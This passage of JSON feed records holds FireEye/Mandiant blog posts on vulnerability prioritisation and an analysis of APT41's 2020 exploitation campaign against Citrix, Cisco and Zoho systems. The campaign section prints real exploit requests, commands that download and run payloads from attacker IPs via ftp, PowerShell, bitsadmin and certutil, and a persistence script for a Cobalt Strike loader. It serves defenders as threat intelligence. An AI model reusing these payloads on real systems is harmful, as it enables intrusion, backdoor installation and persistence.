when we observed exploitation by ransomware operators and Chinese espionage group, APT41.\n\nIn cases like these, threat intelligence can help impacted organizations find the \u201csignal\u201d in the \u201cnoise\u201d and prioritize patching using knowledge of exploitation and the motives and targeting patterns of threat actors behind the exploitation. Enterprises can use intelligence to inform internal stakeholders of the potential risk and provide context as to the potential business and financial impact of a ransomware infection or an intrusion by a highly resourced state sponsored group. This support the immediate patch prioritization decision while simultaneously emphasizing the value of a holistically informed security organization.\n\n_Example 3: Intelligence Reduces Unnecessary Resource Expenditure \u2014 Automating Vulnerability Prioritization and Communications_\n\nAnother common application for vulnerability intelligence is informing security teams and stakeholders when to stand down. When a vulnerability is reported in the media, organizations often spin up resources to patch as quickly as possible. Leveraging threat intelligence in security processes help an organization discern when it is necessary to respond in an all-hands-on-deck manner.\n\nTake the case of the [CVE-2019-12650](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12650>), originally disclosed on Sept. 25, 2019 with an NVD rating of \u201cHigh.\u201d Without further information, an organization relying on this score to determine prioritization may include this vulnerability in the same patch cycle along with numerous other vulnerabilities rated High or Critical. As previously discussed, we have experts review the vulnerability and determine that it required the highest level of privileges available to successfully exploit, and there was no evidence of exploitation in the wild.\n\nThis is a case where threat intelligence reporting as well as automation can effectively minimize the need to unnecessarily spin up resources. Although the public NVD score rated this vulnerability high, Mandiant Intelligence rated it as \u201clow\u201d risk due to the high level of privileges needed to use it and lack of exploitation in the wild. Based on this assessment, organizations may decide that this vulnerability could be patched in the regular cycle and does not necessitate use of additional resources to patch out-of-band. When Mandiant ratings are automatically integrated into the patching ticket generation process, this can support efficient prioritization. Furthermore, an organization could use the analysis to issue an internal communication informing stakeholders of the reasoning behind lowering the prioritization.\n\n#### Vulnerabilities: Managed\n\nBecause we have been closely monitoring vulnerability exploitation trends for years, we were able to distinguish when attacker use of zero-days evolved from use by a select class of highly skilled attackers, to becoming accessible to less skilled groups with enough money to burn. Our observations consistently underscore the speed with which attackers exploit useful vulnerabilities, and the lack of exploitation for vulnerabilities that are hard to use or do not help attackers fulfill their objectives. Our understanding of the threat landscape helps us to discern between hundreds of newly disclosed vulnerabilities to provide ratings and assessments that empower network defenders to focus on the most significant threats and effectively mitigate risk to their organizations.\n\nMandiant Threat Intelligence enables organizations to implement a defense-in-depth approach to holistically mitigate risk by taking all feasible steps\u2014not just patching\u2014to prevent, detect, and stymie attackers at every stage of the attack lifecycle with both technology and human solutions.\n\nRegister today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in [vulnerability threats, trends and recommendations](<https://www.brighttalk.com/webcast/7451/392772>) in our upcoming April 30 webinar.\n\n**Additional Resources**\n\nZero-Day Exploitation Increasingly Demonstrates Access to Money, Rather than Skill \u2014 Intelligence for Vulnerability Management, Part One\n\nThink Fast: Time Between Disclosure, Patch Release and Vulnerability Exploitation \u2014 Intelligence for Vulnerability Management, Part Two\n\nSeparating the Signal from the Noise: How Mandiant Intelligence Rates Vulnerabilities \u2014 Intelligence for Vulnerability Management, Part Three\n\nMandiant offers [Intelligence Capability Development (ICD) services](<https://www.fireeye.com/solutions/cyber-threat-intelligence.html>) to help organizations optimize their ability to consume, analyze and apply threat intelligence.\n\nThe [FIVE tool is available on the FireEye Market](<https://fireeye.market/apps?query=five>). It requires a valid subscription for Mandiant Vulnerability Intelligence, and is driven from an API integration. Please contact your Intelligence Enablement Manager or FireEye Support to obtain API keys. \n\nMandiant's OT Asset Vulnerability Assessment Service informs customers of relevant vulnerabilities by matching a customer's asset list against vulnerabilities and advisories. Relevant vulnerabilities and advisories are delivered in a report from as little as once a year, to as often as once a week. Additional add-on services such as asset inventory development and deep dive analysis of critical assets are available. Please contact your Intelligence Enablement Manager for more information.\n", "modified": "2020-04-27T12:30:00", "published": "2020-04-27T12:30:00", "id": "FIREEYE:E126D2B5A643EE6CD5B128CAC8C217CF", "href": "https://www.fireeye.com/blog/threat-research/2020/04/enabling-defenders-with-vulnerability-intelligence.html", "type": "fireeye", "title": "Putting the Model to Work: Enabling Defenders With Vulnerability\nIntelligence \u2014 Intelligence for Vulnerability Management, Part Four", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-23T01:38:38", "bulletinFamily": "info", "cvelist": ["CVE-2019-0808", "CVE-2019-12650", "CVE-2019-19781", "CVE-2019-5786"], "description": "_One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization\u2019s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations._\n\nEvery information security practitioner knows that patching vulnerabilities is one of the first steps towards a healthy and well-maintained organization. But with thousands of vulnerabilities disclosed each year and media hype about the newest \u201cbranded\u201d vulnerability on the news, it\u2019s hard to know where to start.\n\nThe National Vulnerability Database (NVD) considers a range of factors that are fed into an automated process to arrive at a [score](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator>) for CVSSv3. Mandiant Threat Intelligence takes a different approach, drawing on the insight and experience of our analysts (Figure 1). This human input allows for qualitative factors to be taken into consideration, which gives additional focus to what matters to security operations.\n\n \nFigure 1: How Mandiant Rates Vulnerabilities\n\n#### Assisting Patch Prioritization\n\nWe believe our approach results in a score that is more useful for determining patching priorities, as it allows for the adjustment of ratings based on factors that are difficult to quantify using automated means. It also significantly reduces the number of vulnerabilities rated \u2018high\u2019 and \u2018critical\u2019 compared to CVSSv3 (Figure 2). We consider critical vulnerabilities to pose significant security risks and strongly suggest that remediation steps are taken to address them as soon as possible. We also believe that limiting \u2018critical\u2019 and \u2018high\u2019 designations helps security teams to effectively focus attention on the most dangerous vulnerabilities. For instance, from 2016-2019 Mandiant only rated two vulnerabilities as critical, while NVD assigned 3,651 vulnerabilities a \u2018critical\u2019 rating (Figure 3).\n\n \nFigure 2: Criticality of US National Vulnerability Database (NVD) CVSSv3 ratings 2016-2019 compared to Mandiant vulnerability ratings for the same vulnerabilities\n\n \nFigure 3: Numbers of ratings at various criticality tiers from NVD CVSSv3 scores compared to Mandiant ratings for the same vulnerabilities\n\n#### Mandiant Vulnerability Ratings Defined\n\nOur rating system includes both an exploitation rating and a risk rating:\n\nThe _Exploitation Rating_ is an in indication of what is occurring in the wild.\n\n \nFigure 4: Mandiant Exploitation Rating definitions\n\nThe_ Risk Rating_ is our expert assessment of what impact an attacker could have on a targeted organization, if they were to exploit a vulnerability.\n\n \nFigure 5: Mandiant Risk Rating definitions\n\nWe intentionally use the critical rating sparingly, typically in cases where exploitation has serious impact, exploitation is trivial with often no real mitigating factors, and the attack surface is large and remotely accessible. When Mandiant uses the critical rating, it is an indication that remediation should be a top priority for an organization due to the potential impacts and ease of exploitation.\n\nFor example, Mandiant Threat Intelligence rated CVE-2019-19781 as critical due to the confluence of widespread exploitation\u2014including by APT41\u2014the public release of proof-of-concept (PoC) code that facilitated automated exploitation, the potentially acute outcomes of exploitation, and the ubiquity of the software in enterprise environments.\n\nCVE-2019-19781 is a path traversal vulnerability of the Citrix Application Delivery Controller (ADC) 13.0 that when exploited, allows an attacker to remotely execute arbitrary code. Due to the nature of these systems, successful exploitation could lead to further compromises of a victim's network through lateral movement or the discovery of Active Directory (AD) and/or LDAP credentials. Though these credentials are often stored in hashes, they have been proven to be vulnerable to password cracking. Depending on the environment, the potential second order effects of exploitation of this vulnerability could be severe.\n\nWe described widespread exploitation of CVE-2019-19781 in our [blog post](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>) earlier this year, including a timeline from disclosure on Dec. 17, 2019, to the patch releases, which began a little over a month later on Jan. 20, 2020. Significantly, within hours of the release of PoC code on Jan. 10, 2020, we detected reconnaissance for this vulnerability in FireEye telemetry data. Within days, we observed weaponized exploits used to gain footholds in victim environments. On the same day the first patches were released, Jan. 20, 2020, we [observed](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>) APT41, one of the most prolific Chinese groups we track, kick off an expansive campaign exploiting CVE-2019-19781 and other vulnerabilities against numerous targets.\n\n#### Factors Considered in Ratings\n\nOur vulnerability analysts consider a wide variety of impact-intensifying and mitigating factors when rating a vulnerability. Factors such as actor interest, availability of exploit or PoC code, or exploitation in the wild can inform our analysis, but are not primary elements in rating.\n\n_Impact considerations_ help determine what impact exploitation of the vulnerability can have on a targeted system.\n\n**Impact Type**\n\n| \n\n**Impact Consideration** \n \n---|--- \n \nExploitation Consequence\n\n| \n\nThe result of successful exploitation, such as privilege escalation or remote code execution \n \nConfidentiality Impact\n\n| \n\nThe extent to which exploitation can compromise the confidentiality of data on the impacted system \n \nIntegrity Impact\n\n| \n\nThe extent to which exploitation allows attackers to alter information in impacted systems \n \nAvailability Impact\n\n| \n\nThe extent to which exploitation disrupts or restricts access to data or systems \n \n_Mitigating factors_ affect an attacker\u2019s likelihood of successful exploitation.\n\n**Mitigating Factor**\n\n| \n\n**Mitigating Consideration** \n \n---|--- \n \nExploitation Vector\n\n| \n\nWhat methods can be used to exploit the vulnerability? \n \nAttacking Ease\n\n| \n\nHow difficult is the exploit to use in practice? \n \nExploit Reliability\n\n| \n\nHow consistently can the exploit execute and perform the intended malicious activity? \n \nAccess Vector\n\n| \n\nWhat type of access (i.e. local, adjacent network, or network) is required to successfully exploit the vulnerability? \n \nAccess Complexity\n\n| \n\nHow difficult is it to gain access needed for the vulnerability? \n \nAuthentication Requirements\n\n| \n\nDoes the exploitation require authentication and, if so, what type of authentication? \n \nVulnerable Product Ubiquity\n\n| \n\nHow commonly is the vulnerable product used in enterprise environments? \n \nProduct's Targeting Value\n\n| \n\nHow attractive is the vulnerable software product or device to threat actors to target? \n \nVulnerable Configurations\n\n| \n\nDoes exploitation require specific configurations, either default or non-standard? \n \n#### Mandiant Vulnerability Rating System Applied\n\nThe following are examples of cases in which Mandiant Threat Intelligence rated vulnerabilities differently than NVD by considering additional factors and incorporating information that either was not reported to NVD or is not easily quantified in an algorithm.\n\n**Vulnerability**\n\n| \n\n**Vulnerability Description**\n\n| \n\n**NVD Rating**\n\n| \n\n**Mandiant Rating**\n\n| \n\n**Explanation** \n \n---|---|---|---|--- \n \nCVE-2019-12650\n\n| \n\nA command injection vulnerability in the Web UI component of Cisco IOS XE versions 16.11.1 and earlier that, when exploited, allows a privileged attacker to remotely execute arbitrary commands with root privileges****\n\n| \n\nHigh\n\n| \n\nLow\n\n| \n\nThis vulnerability was rated high by NVD, but Mandiant Threat Intelligence rated it as low risk because it requires the highest level of privileges \u2013 level 15 admin privileges \u2013 to exploit. Because this level of access should be quite limited in enterprise environments, we believe that it is unlikely attackers would be able to leverage this vulnerability as easily as others. There is no known exploitation of this activity.**** \n \nCVE-2019-5786\n\n| \n\nA use after free vulnerability within the FileReader component in Google Chrome 72.0.3626.119 and prior that, when exploited, allows an attacker to remotely execute arbitrary code. \n\n** **\n\n| \n\nMedium\n\n| \n\nHigh\n\n| \n\nNVD rated CVE-2019-5786 as medium, while Mandiant Threat Intelligence rated it as high risk. The difference in ratings is likely due to NVD describing the consequences of exploitation as denial of service, while we know of exploitation in the wild which results in remote code execution in the context of the renderer, which is a more serious outcome.**** \n \nAs demonstrated, factors such as the assessed ease of exploitation and the observance of exploitation in the wild may result a different priority rating than the one issued by NVD. In the case of CVE-2019-12650, we ultimately rated this vulnerability lower than NVD due to the required privileges needed to execute the vulnerability as well as the lack of observed exploitation. On the other hand, we rated the CVE-2019-5786 as high risk due to the assessed severity, ubiquity of the software, and confirmed exploitation.\n\nIn early 2019, Google [reported](<https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html>) two zero-day vulnerabilities were being used together in the wild: CVE-2019-5786 (Chrome zero-day vulnerability) and CVE-2019-0808 (a Microsoft privilege escalation vulnerability). Google quickly released a patch for the Chrome vulnerability pushed it to users through Chrome\u2019s auto-update feature on March 1. CVE-2019-5786 is significant because it can impact all major operating systems, Windows, Mac OS, and Linux, and requires only minimal user interaction, such as navigating or following a link to a website hosting exploit code, to achieve remote code execution. The severity is further compounded by a public [blog post](<https://blog.exodusintel.com/2019/03/20/cve-2019-5786-analysis-and-exploitation/>) and proof of concept exploit code that was released a few weeks later and subsequently incorporated into a Metasploit module.\n\n#### The Future of Vulnerability Analysis Requires Algorithms _and_ Human Intelligence\n\nWe expect that the volume of vulnerabilities to continue to increase in coming years, emphasizing the need for a rating system that accurately identifies the most significant vulnerabilities and provides enough nuance to allow security teams to tackle patching in a focused manner. As the quantity of vulnerabilities grows, incorporating assessments of malicious actor use, that is, observed exploitation as well as the feasibility and relative ease of using a particular vulnerability, will become an even more important factor in making meaningful prioritization decisions.\n\nMandiant Threat Intelligence believes that the future of vulnerability analysis will involve a combination of machine (structured or algorithmic) and human analysis to assess the potential impact of a vulnerability and the true threat that it poses to organizations. Use of structured algorithmic techniques, which are common in many models, allows for consistent and transparent rating levels, while the addition of human analysis allows experts to integrate factors that are difficult to quantify, and adjust ratings based on real-world experience regarding the actual risk posed by various types of vulnerabilities.\n\nHuman curation and enhancement layered on top of automated rating will provide the best of both worlds: speed and accuracy. We strongly believe that paring down alerts and patch information to a manageable number, as well as clearly communicating risk levels with Mandiant vulnerability ratings makes our system a powerful tool to equip network defenders to quickly and confidently take action against the highest priority issues first.\n\nRegister today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in [vulnerability threats, trends and recommendations](<https://www.brighttalk.com/webcast/7451/392772>) in our upcoming April 30 webinar.\n", "modified": "2020-04-20T12:00:00", "published": "2020-04-20T12:00:00", "id": "FIREEYE:173497473E4F8289490BBFFF8E828EC9", "href": "https://www.fireeye.com/blog/threat-research/2020/04/how-mandiant-intelligence-rates-vulnerabilities.html", "type": "fireeye", "title": "Separating the Signal from the Noise: How Mandiant Intelligence Rates\nVulnerabilities \u2014 Intelligence for Vulnerability Management, Part Three", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-11-23T01:51:24", "bulletinFamily": "info", "cvelist": ["CVE-2019-1652", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-10189", "CVE-2020-10198"], "description": "Beginning this year, FireEye observed [Chinese actor APT41](<https://content.fireeye.com/apt-41/rpt-apt41/>) carry out one of the broadest campaigns by a Chinese cyber espionage actor we have observed in recent years. Between January 20 and March 11, FireEye observed APT41 attempt to exploit vulnerabilities in [Citrix NetScaler/ADC](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), Cisco routers, and [Zoho ManageEngine Desktop Central](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) at over 75 FireEye customers. Countries we\u2019ve seen targeted include Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, UK and USA. The following industries were targeted: Banking/Finance, Construction, Defense Industrial Base, Government, Healthcare, High Technology, Higher Education, Legal, Manufacturing, Media, Non-profit, Oil &amp; Gas, Petrochemical, Pharmaceutical, Real Estate, Telecommunications, Transportation, Travel, and Utility. It\u2019s unclear if APT41 scanned the Internet and attempted exploitation en masse or selected a subset of specific organizations to target, but the victims appear to be more targeted in nature.\n\n#### Exploitation of CVE-2019-19781 (Citrix Application Delivery Controller [ADC])\n\nStarting on January 20, 2020, APT41 used the IP address 66.42.98[.]220 to attempt exploits of Citrix Application Delivery Controller (ADC) and Citrix Gateway devices with [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>) (published December 17, 2019).\n\n \nFigure 1: Timeline of key events\n\nThe initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command \u2018file /bin/pwd\u2019, which may have achieved two objectives for APT41. First, it would confirm whether the system was vulnerable and the [mitigation](<https://support.citrix.com/article/CTX267679>) wasn\u2019t applied. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step. \n\nOne interesting thing to note is that all observed requests were only performed against Citrix devices, suggesting APT41 was operating with an already-known list of identified devices accessible on the internet.\n\nPOST /vpns/portal/scripts/newbm.pl HTTP/1.1 \nHost: [redacted] \nConnection: close \nAccept-Encoding: gzip, deflate \nAccept: */* \nUser-Agent: python-requests/2.22.0 \nNSC_NONCE: nsroot \nNSC_USER: ../../../netscaler/portal/templates/[redacted] \nContent-Length: 96 \n \nurl=http://example.com&amp;title=[redacted]&amp;desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %] \n \n--- \n \nFigure 2: Example APT41 HTTP traffic exploiting CVE-2019-19781\n\nThere is a lull in APT41 activity between January 23 and February 1, which is likely related to the Chinese Lunar New Year holidays which occurred between January 24 and January 30, 2020. This has been a common activity pattern by Chinese APT groups in past years as well.\n\nStarting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command \u2018/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\\@66.42.98[.]220/bsd\u2019, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of \u2018test\u2019 and a password that we have redacted, and then downloaded an unknown payload named \u2018bsd\u2019 (which was likely a backdoor).\n\nPOST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1 \nAccept-Encoding: identity \nContent-Length: 147 \nConnection: close \nNsc_User: ../../../netscaler/portal/templates/[redacted] \nUser-Agent: Python-urllib/2.7 \nNsc_Nonce: nsroot \nHost: [redacted] \nContent-Type: application/x-www-form-urlencoded \n \nurl=http://example.com&amp;title=[redacted]&amp;desc=[% template.new('BLOCK' = '**print `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\\@66.42.98[.]220/bsd**`') %] \n \n--- \n \nFigure 3: Example APT41 HTTP traffic exploiting CVE-2019-19781\n\nWe did not observe APT41 activity at FireEye customers between February 2 and February 19, 2020. China initiated COVID-19 related quarantines in cities in Hubei province starting on January 23 and January 24, and rolled out quarantines to additional provinces starting between February 2 and February 10. While it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry. We observed a significant uptick in CVE-2019-19781 exploitation on February 24 and February 25. The exploit behavior was almost identical to the activity on February 1, where only the name of the payload \u2018un\u2019 changed.\n\nPOST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1 \nAccept-Encoding: identity \nContent-Length: 145 \nConnection: close \nNsc_User: ../../../netscaler/portal/templates/[redacted] \nUser-Agent: Python-urllib/2.7 \nNsc_Nonce: nsroot \nHost: [redacted] \nContent-Type: application/x-www-form-urlencoded \n \nurl=http://example.com&amp;title= [redacted]&amp;desc=[% template.new('BLOCK' = '**print `/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\\@66.42.98[.]220/un**`') %] \n \n--- \n \nFigure 4: Example APT41 HTTP traffic exploiting CVE-2019-19781\n\nCitrix released a [mitigation](<https://support.citrix.com/article/CTX267027>) for CVE-2019-19781 on December 17, 2019, and as of January 24, 2020, released permanent fixes for all supported versions of Citrix ADC, Gateway, and SD-WAN WANOP.\n\n#### Cisco Router Exploitation\n\nOn February 21, 2020, APT41 successfully exploited a Cisco RV320 router at a telecommunications organization and downloaded a 32-bit ELF binary payload compiled for a 64-bit MIPS processor named \u2018fuc\u2019 (MD5: 155e98e5ca8d662fad7dc84187340cbc). It is unknown what specific exploit was used, but there is a Metasploit module that combines two CVE\u2019s ([CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) and [CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>)) to [enable remote code execution on Cisco RV320 and RV325](<https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv32x_rce>) small business routers and uses wget to download the specified payload.\n\nGET /test/fuc \nHTTP/1.1 \nHost: 66.42.98\\\\.220 \nUser-Agent: Wget \nConnection: close \n \n--- \n \nFigure 5: Example HTTP request showing Cisco RV320 router downloading a payload via wget\n\n66.42.98[.]220 also hosted a file name http://66.42.98[.]220/test/1.txt. The content of 1.txt (MD5: c0c467c8e9b2046d7053642cc9bdd57d) is \u2018cat /etc/flash/etc/nk_sysconfig\u2019, which is the command one would execute on a Cisco RV320 router to display the current configuration.\n\nCisco PSIRT confirmed that fixed software to address the noted vulnerabilities is available and asks customers to review the following security advisories and take appropriate action:\n\n * [Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>)\n * [Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>)\n\n#### Exploitation of CVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)\n\nOn March 5, 2020, researcher [Steven Seeley](<https://twitter.com/steventseeley/status/1235635108498948096?s=20>), published [an advisory](<https://srcincite.io/advisories/src-2020-0011/>) and released [proof-of-concept code](<https://srcincite.io/pocs/src-2020-0011.py.txt>) for a zero-day remote code execution vulnerability in Zoho ManageEngine Desktop Central versions prior to 10.0.474 ([CVE-2020-10189)](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>). Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise of at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed. In the first variation the CVE-2020-10189 exploit was used to directly upload \u201clogger.zip\u201d, a simple Java based program, which contained a set of commands to use PowerShell to download and execute install.bat and storesyncsvc.dll.\n\njava/lang/Runtime\n\ngetRuntime\n\n()Ljava/lang/Runtime;\n\nXcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/install.bat','C:\\ \nWindows\\Temp\\install.bat')&amp;powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/storesyncsvc.dll',' \nC:\\Windows\\Temp\\storesyncsvc.dll')&amp;C:\\Windows\\Temp\\install.bat\n\n'(Ljava/lang/String;)Ljava/lang/Process;\n\nStackMapTable\n\nysoserial/Pwner76328858520609\n\nLysoserial/Pwner76328858520609; \n \n--- \n \nFigure 6: Contents of logger.zip\n\nHere we see a toolmark from the tool [ysoserial](<https://github.com/frohoff/ysoserial>) that was used to create the payload in the POC. The string Pwner76328858520609 is unique to the POC payload, indicating that APT41 likely used the POC as source material in their operation.\n\nIn the second variation, FireEye observed APT41 leverage the Microsoft BITSAdmin command-line tool to download install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from known APT41 infrastructure 66.42.98[.]220 on port 12345.\n\nParent Process: C:\\ManageEngine\\DesktopCentral_Server\\jre\\bin\\java.exe\n\nProcess Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\\Users\\Public\\install.bat \n \n--- \n \nFigure 7: Example FireEye Endpoint Security event depicting successful CVE-2020-10189 exploitation\n\nIn both variations, the install.bat batch file was used to install persistence for a trial-version of Cobalt Strike BEACON loader named storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f).\n\n@echo off\n\nset \"WORK_DIR=C:\\Windows\\System32\"\n\nset \"DLL_NAME=storesyncsvc.dll\"\n\nset \"SERVICE_NAME=StorSyncSvc\"\n\nset \"DISPLAY_NAME=Storage Sync Service\"\n\nset \"DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly.\"\n\nsc stop %SERVICE_NAME%\n\nsc delete %SERVICE_NAME%\n\nmkdir %WORK_DIR%\n\ncopy \"%~dp0%DLL_NAME%\" \"%WORK_DIR%\" /Y\n\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v \"%SERVICE_NAME%\" /t REG_MULTI_SZ /d \"%SERVICE_NAME%\" /f\n\nsc create \"%SERVICE_NAME%\" binPath= \"%SystemRoot%\\system32\\svchost.exe -k %SERVICE_NAME%\" type= share start= auto error= ignore DisplayName= \"%DISPLAY_NAME%\"\n\nSC failure \"%SERVICE_NAME%\" reset= 86400 actions= restart/60000/restart/60000/restart/60000\n\nsc description \"%SERVICE_NAME%\" \"%DESCRIPTION%\"\n\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\%SERVICE_NAME%\\Parameters\" /f\n\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\%SERVICE_NAME%\\Parameters\" /v \"ServiceDll\" /t REG_EXPAND_SZ /d \"%WORK_DIR%\\%DLL_NAME%\" /f\n\nnet start \"%SERVICE_NAME%\" \n \n--- \n \nFigure 8: Contents of install.bat\n\nStoresyncsvc.dll was a Cobalt Strike BEACON implant (trial-version) which connected to exchange.dumb1[.]com (with a DNS resolution of 74.82.201[.]8) using a jquery malleable command and control (C2) profile.\n\nGET /jquery-3.3.1.min.js HTTP/1.1 \nHost: cdn.bootcss.com \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nReferer: http://cdn.bootcss.com/ \nAccept-Encoding: gzip, deflate \nCookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYM \nDA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLI \nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko \nConnection: Keep-Alive Cache-Control: no-cache \n \n--- \n \nFigure 9: Example APT41 Cobalt Strike BEACON jquery malleable C2 profile HTTP request\n\nWithin a few hours of initial exploitation, APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor with a different C2 address that uses Microsoft CertUtil, a common TTP that we\u2019ve observed APT41 use in past intrusions, which they then used to download 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c). The file 2.exe was a VMProtected Meterpreter downloader used to download Cobalt Strike BEACON shellcode. The usage of VMProtected binaries is another very common TTP that we\u2019ve observed this group leverage in multiple intrusions in order to delay analysis of other tools in their toolkit.\n\nGET /2.exe HTTP/1.1 \nCache-Control: no-cache \nConnection: Keep-Alive \nPragma: no-cache \nAccept: */* \nUser-Agent: Microsoft-CryptoAPI/6.3 \nHost: 91.208.184[.]78 \n \n--- \n \nFigure 10: Example HTTP request downloading \u20182.exe\u2019 VMProtected Meterpreter downloader via CertUtil\n\ncertutil -urlcache -split -f http://91.208.184[.]78/2.exe \n \n--- \n \nFigure 11: Example CertUtil command to download \u20182.exe\u2019 VMProtected Meterpreter downloader\n\nThe Meterpreter downloader \u2018TzGG\u2019 was configured to communicate with 91.208.184[.]78 over port 443 to download the shellcode (MD5: 659bd19b562059f3f0cc978e15624fd9) for Cobalt Strike BEACON (trial-version).\n\nGET /TzGG HTTP/1.1 \nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0) \nHost: 91.208.184[.]78:443 \nConnection: Keep-Alive \nCache-Control: no-cache \n \n--- \n \nFigure 12: Example HTTP request downloading \u2018TzGG\u2019 shellcode for Cobalt Strike BEACON\n\nThe downloaded BEACON shellcode connected to the same C2 server: 91.208.184[.]78. We believe this is an example of the actor attempting to diversify post-exploitation access to the compromised systems.\n\nManageEngine released a short term [mitigation](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) for CVE-2020-10189 on January 20, 2020, and subsequently released an [update](<https://www.manageengine.com/products/desktop-central/rce-vulnerability-cve-2020-10189.html?utm_source=rce-kb>) on March 7, 2020, with a long term fix.\n\n#### Outlook\n\nThis activity is one of the most widespread campaigns we have seen from China-nexus espionage actors in recent years. While APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation _has focused on a subset of our customers_, and seems to reveal a high operational tempo and wide collection requirements for APT41.\n\nIt is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks. This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage.\n\nPreviously, FireEye Mandiant Managed Defense identified APT41 successfully leverage CVE-2019-3396 (Atlassian Confluence) against a U.S. based university. While APT41 is a [unique](<https://content.fireeye.com/apt-41/rpt-apt41/>) state-sponsored Chinese threat group that conducts espionage, the actor also conducts financially motivated activity for personal gain.\n\n#### Indicators\n\nType\n\n| \n\nIndicator(s) \n \n---|--- \n \nCVE-2019-19781 Exploitation (Citrix Application Delivery Control)\n\n| \n\n66.42.98[.]220\n\nCVE-2019-19781 exploitation attempts with a payload of \u2018file /bin/pwd\u2019\n\nCVE-2019-19781 exploitation attempts with a payload of \u2018/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\\@66.42.98[.]220/bsd\u2019\n\nCVE-2019-19781 exploitation attempts with a payload of \u2018/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\\@66.42.98[.]220/un\u2019\n\n/tmp/bsd\n\n/tmp/un \n \nCisco Router Exploitation\n\n| \n\n66.42.98\\\\.220\n\n\u20181.txt\u2019 (MD5: c0c467c8e9b2046d7053642cc9bdd57d)\n\n\u2018fuc\u2019 (MD5: 155e98e5ca8d662fad7dc84187340cbc \n \nCVE-2020-10189 (Zoho ManageEngine Desktop Central)\n\n| 